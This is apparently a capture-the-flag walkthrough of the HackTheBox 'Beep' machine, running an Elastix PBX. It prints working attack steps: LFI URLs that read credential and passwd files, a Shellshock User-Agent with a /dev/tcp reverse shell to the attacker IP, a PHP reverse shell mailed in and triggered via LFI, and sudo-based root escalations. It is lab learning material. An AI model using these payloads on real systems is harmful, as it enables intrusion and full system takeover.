HackTheBox - Beep Walkthrough
# Jul 19, 2019
Easy linux box with lost of paths to root - LFI with password reusage, LFI to RCE via mail, Shellshock and so on.
1. Recon and Information gathering
Nmap
root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -oN base_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-17 20:25 EEST
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: EXPIRE(NEVER) APOP LOGIN-DELAY(0) TOP STLS RESP-CODES USER PIPELINING AUTH-RESP-CODE UIDL IMPLEMENTATION(Cyrus POP3 server v2)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ID LITERAL+ ATOMIC CATENATE CHILDREN X-NETSCAPE CONDSTORE LISTEXT URLAUTHA0001 IMAP4 LIST-SUBSCRIBED NO IDLE OK SORT=MODSEQ STARTTLS THREAD=REFERENCES MAILBOX-REFERRALS MULTIAPPEND IMAP4rev1 NAMESPACE ANNOTATEMORE RENAME SORT BINARY UNSELECT RIGHTS=kxte THREAD=ORDEREDSUBJECT ACL QUOTA UIDPLUS Completed
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2019-07-17T17:23:25+00:00; -4m57s from scanner time.
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Host script results:
|_clock-skew: -4m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 290.44 seconds
Additionally checking all ports I got some less known open ports:
879/tcp open unknown
4190/tcp open sieve
4559/tcp open hylafax
5038/tcp open unknown
Let’s get some more info on them:
root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -p 879,4190,4559,5038 -oN more_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-18 13:14 EEST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
879/tcp closed unknown
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
Service Info: Host: localhost; OS: Unix
Services
HTTP
So I have a “Elastix” app - no idea what it is. Let’s google a bit and see if there’s something interesting.
Okay, so it’s a PBX software - mailing, calls, etc. And dirbusting shows a looot of directories - roundcube, voicemail login, different dirs without indexes, etc.
root@kali:/vagrant/hackthebox/beep# gobuster dir -w /opt/wordlists/directory-medium.txt -u https://10.10.10.7 -k -t 50 -x php,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.7
[+] Threads: 50
[+] Wordlist: /opt/wordlists/directory-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,zip
[+] Timeout: 10s
===============================================================
2019/07/17 21:37:19 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/index.php (Status: 200)
/register.php (Status: 200)
/modules (Status: 301)
/themes (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/config.php (Status: 200)
/robots.txt (Status: 200)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
<...>
Also I have some vulns from searchsploit, but I need to check them if they can be used:
root@kali:/vagrant/hackthebox/beep# searchsploit elastix
Exploit Title | Path | (/opt/exploitdb/)
Elastix - ‘page’ Cross-Site Scripting | exploits/php/webapps/38078.py Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt Elastix 2.2.0 - ‘graph.php’ Local File Inclusion | exploits/php/webapps/37637.pl Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
Asterisk
The voip service has quite the list of vulns, have to check if they are present on the version the server has.
root@kali:/vagrant/hackthebox/beep# searchsploit Asterisk
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection | exploits/linux/remote/30677.pl
Asterisk - 'ast_parse_digest()' Stack Buffer Overflow (PoC) | exploits/linux/dos/18855.txt
Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access | exploits/cgi/webapps/26475.txt
Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC) | exploits/multiple/dos/2597.pl
Asterisk 1.2.15/1.4.0 - Remote Denial of Service | exploits/multiple/dos/3407.c
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service | exploits/multiple/dos/3566.pl
Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash | exploits/multiple/dos/5749.pl
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1) | exploits/multiple/dos/29900.txt
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (2) | exploits/multiple/dos/29901.txt
Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities | exploits/linux/dos/31440.txt
Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service | exploits/linux/dos/32095.pl
Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration | exploits/linux/remote/35801.txt
Asterisk 1.8.x - SIP INVITE Request User Enumeration | exploits/multiple/remote/35685.txt
Asterisk 1.x - BYE Message Remote Denial of Service | exploits/multiple/dos/30974.txt
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption | exploits/multiple/dos/43992.py
Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash | exploits/multiple/dos/4249.rb
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service | exploits/multiple/dos/4196.c
Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service) | exploits/multiple/dos/8940.pl
Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities | exploits/linux/remote/24221.pl
Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure | exploits/multiple/remote/27716.txt
Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities | exploits/multiple/remote/34301.txt
Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service | exploits/linux/dos/44181.py
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service | exploits/linux/dos/44183.py
Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service | exploits/linux/dos/44182.py
Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption | exploits/linux/dos/44184.py
Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting | exploits/php/webapps/38375.txt
Fonality trixbox - 'asterisk_info.php' Directory Traversal | exploits/php/webapps/39349.txt
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Webmin
For webmin we have shellshock to try (hello cgi!)..
2. Initial foothold/low priv access.
The easiest way is to use the LFI vuln in vtigercrm - exploits/php/webapps/37637.pl
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action
HTTP/1.1 200 OK
Date: Fri, 19 Jul 2019 13:12:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13779
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
AUTHTYPE=database
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk
Sorry! Attempt to access restricted file.
https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash distcache:x:94:94:Distcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash dbus:x:81:81:System message bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin spamfilter:x:500:500::/home/spamfilter:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action
<...>
Sorry! Attempt to access restricted file.
Tried connecting to mysql with the credentials I found with the LFI, but no luck:
root@kali:/vagrant/hackthebox/beep# mysql -u asteriskuser -h 10.10.10.7 -p
Enter password:
ERROR 1130 (HY000): Host '10.10.14.25' is not allowed to connect to this MySQL server
aand… trying the users from /etc/passwd with the passwords with ssh i get a match for root…:
root@kali:/vagrant/hackthebox/beep# ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Tue Jul 16 11:45:47 2019
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cat /root/root.txt
<...>
Damn password reusage :/
Shellshock
I modified the User-Agent and used the /dev/tcp shell for a blind shellshock:
GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :;}; bash -i >& /dev/tcp/10.10.14.25/4848 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ARI=r5hkca7mh8ln12n4la4o8neat1; PHPSESSID=737p48sdv47673q4m1l3mlppd7; elastixSession=3lj6vt1946kqiliifee0655ra2; testing=1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
root@kali:/vagrant/hackthebox/beep# nc -lvnp 4848
listening on [any] 4848 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 58740
bash: no job control in this shell
[root@beep webmin]# id
uid=0(root) gid=0(root)
SMTP + LFI
Maybe the coolest way to pwn the box - ofc thanks to ippsec:
root@kali:/vagrant/hackthebox/beep# sendemail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s 10.10.10.7:25 -f flame_n@htb.eu
Jul 19 15:12:14 kali sendemail[11143]: Email was sent successfully!
Start a netcat listener, then open https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action aaand - profit!
root@kali:/vagrant/hackthebox/beep# nc -lvnp 4949
listening on [any] 4949 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 35358
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
22:08:39 up 5:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh: no job control in this shell
sh-3.2$
3. Privilege Escalation
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
Okay… lots of tricks here… nmap, chown, chmod, etc.:
Chown
bash-3.2$ sudo chown asterisk:asterisk /etc/passwd
bash-3.2$ echo "flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash" >> /etc/passwd
echo "flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash" >> /etc/passwd
bash-3.2$ su - flame
su - flame
Password: flamen
[root@beep ~]# id
id
uid=0(root) gid=0(root) groups=0(root)
Nmap
bash-3.2$ sudo nmap --interactive
sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Service
bash-3.2$ sudo /sbin/service ../../../bin/bash
sudo /sbin/service ../../../bin/bash
[root@beep /]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
And so on, check out the good folks at https://gtfobins.github.io/
Overall cool machine - easy, but still great playground for testing different paths to root.